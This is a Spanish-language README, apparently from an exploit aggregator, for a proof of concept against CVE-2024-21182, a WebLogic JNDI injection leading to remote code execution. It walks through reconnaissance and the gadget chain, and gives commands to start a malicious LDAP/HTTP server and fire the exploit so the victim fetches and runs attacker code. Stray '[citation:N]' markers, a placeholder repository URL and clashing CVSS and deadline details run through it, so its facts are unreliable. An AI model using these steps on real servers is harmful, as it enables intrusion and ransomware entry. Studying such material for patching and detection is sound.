## https://sploitus.com/exploit?id=6BABC14A-9ADE-52FC-B15C-C89719369496
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
# CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
[](https://nvd.nist.gov/vuln/detail/CVE-2024-21182)
[-orange)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
[](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
## 📋 Descripción
**CVE-2024-21182** es una vulnerabilidad de inyección JNDI no autenticada que afecta al componente Core de Oracle WebLogic Server. Permite a un atacante remoto, a través de los protocolos T3 o IIOP, ejecutar código arbitrario (RCE) en el servidor, pudiendo obtener acceso completo a todos los datos del servidor[citation:5][citation:8][citation:9].
Este repositorio contiene un **Proof of Concept (PoC) funcional** que demuestra la explotación exitosa del parche de CVE-2023-21839 mediante la cadena de gadgets `AggregatableOpaqueReference` + `MessageDestinationReference`[citation:2][citation:4].
## 🚨 Detalles de la Vulnerabilidad
| Atributo | Valor |
|---|---|
| **CVE** | CVE-2024-21182 |
| **Producto** | Oracle WebLogic Server (Core) |
| **Versiones afectadas** | 12.2.1.4.0 y 14.1.1.0.0[citation:7] |
| **Parche disponible** | Oracle Critical Patch Update (Julio 2024 y Octubre 2024)[citation:6] |
| **Estado en CISA KEV** | Explotación activa confirmada (añadida el 01/06/2026)[citation:3][citation:8] |
| **Fecha límite de mitigación (CISA)** | 04/06/2026[citation:8] |
### Vector de Ataque
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Red** (AV:N): Explotable remotamente
- **Baja complejidad** (AC:L): Sin condiciones especiales
- **Sin autenticación** (PR:N): Acceso anónimo
- **Sin interacción del usuario** (UI:N): Explotación pasiva
## ⚙️ Fases del Ataque
**Fase 1: Reconocimiento**: Identificar servidores WebLogic con los puertos T3/IIOP (7001) expuestos.
**Fase 2: Análisis**: Determinar si el servidor ejecuta una versión vulnerable (12.2.1.4.0 o 14.1.1.0.0) o carece del parche de Octubre 2024.
**Fase 3: Explotación** (flujo técnico):
1. **Construcción del Gadget**: El atacante crea un objeto `AggregatableOpaqueReference`[citation:2].
2. **Inyección de Referencia**: Mediante reflexión (Java), se modifica el campo privado `referent` del objeto anterior para que apunte a un `MessageDestinationReference` malicioso[citation:4].
3. **Bind y Lookup**: El objeto malicioso se "encadena" (bind) en el árbol JNDI del servidor y luego se "busca" (lookup).
4. **Resolución JNDI**: Al buscar el objeto, el servidor ejecuta una nueva consulta JNDI contra la URL controlada por el atacante (servidor LDAP).
5. **Servidor LDAP**: Responde con una referencia a un código Java alojado en el servidor HTTP del atacante.
6. **Ejecución de Código**: El servidor WebLogic descarga e instancia la clase Java, ejecutando su contenido en el contexto de la máquina víctima.
## 🛠️ Prerrequisitos
- **Docker y Docker Compose**: Para el entorno de pruebas aislado[citation:2].
- **JDK 8 o superior**: Para compilar y ejecutar el cliente T3.
- **Cliente T3 de WebLogic**: `wlthint3client.jar` (se puede extraer de una instalación de WebLogic).
## 🚀 Uso del PoC
### Entorno de Laboratorio (Docker)
```bash
# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d
# 3. Ejecutar la explotación automática
./validate.sh
Explotación contra un objetivo real (autorizado)
bash
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py
# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://:7001 ldap://:1389/Evil
📊 Impacto Demostrado
Ejecución remota de comandos (RCE) en el servidor
Acceso no autorizado a datos críticos de la aplicación
Compromiso completo del servidor de aplicaciones
Potencial puerta de entrada para movimiento lateral en la red corporativa
Base para despliegue de ransomware u otras cargas maliciosas
Estado actual según CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Pero típicamente sí, las RCE en middleware son vector inicial en intrusiones de ransomware).
🛡️ Mitigación
Parchear inmediatamente: Aplicar el Critical Patch Update de Oracle de Octubre 2024 o posterior.
Restricción de red: Bloquear/limitar el acceso a los puertos T3/IIOP (ej. 7001) solo a orígenes confiables.
Monitoreo: Detectar intentos de bind/lookup inusuales en el árbol JNDI.
⚠️ Aviso Legal
Este código es únicamente con fines educativos y de investigación. El uso indebido de este PoC contra sistemas sin autorización expresa es ilegal. El autor no se hace responsable del mal uso de esta información.
📚 Referencias
NVD - CVE-2024-21182
CISA KEV Catalog
Oracle Security Advisory
Análisis técnico original
🤝 Créditos
Investigador original que descubrió la cadena de gadgets
dinosn por el laboratorio reproducible en Docker